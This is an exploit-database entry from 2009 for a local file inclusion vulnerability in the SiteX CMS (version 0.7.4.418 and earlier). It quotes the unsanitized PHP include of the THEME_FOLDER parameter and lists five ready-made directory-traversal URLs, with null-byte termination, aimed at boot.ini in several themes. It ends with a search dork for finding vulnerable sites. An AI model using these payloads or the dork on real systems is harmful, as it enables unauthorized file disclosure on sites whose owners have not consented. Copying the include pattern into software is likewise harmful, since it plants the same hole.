SiteX <= 0.7.4.418 (THEME_FOLDER) Local File Inclusion Vulnerabilities

2009-05-27T00:00:00
ID 1337DAY-ID-5265
Type zdt
Reporter ahmadbady
Modified 2009-05-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
SiteX <= 0.7.4.418 (THEME_FOLDER) Local File Inclusion Vulnerabilities
======================================================================


                =-=-local file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script:SiteX_074_build_418.zip
-------------------------------------------------
Author: ahmadbady
my site :Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://sourceforge.net/project/showfiles.php?group_id=121558&package_id=290027

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
vul:/themes/themes_folders/homepage.php
<?PHP
include("themes/$THEME_FOLDER/header.php"); line 2
--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=
xpl:
path/themes/Corporate/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Fusion/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Joombo/homepage.ph?THEME_FOLDER=../../../boot.ini%00
path/themes/Streamline/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Structure/homepage.php?THEME_FOLDER=../../../boot.ini%00
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=
dork:"Powered by SiteX 0.7 Beta"   
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=



#  0day.today [2018-02-17]  #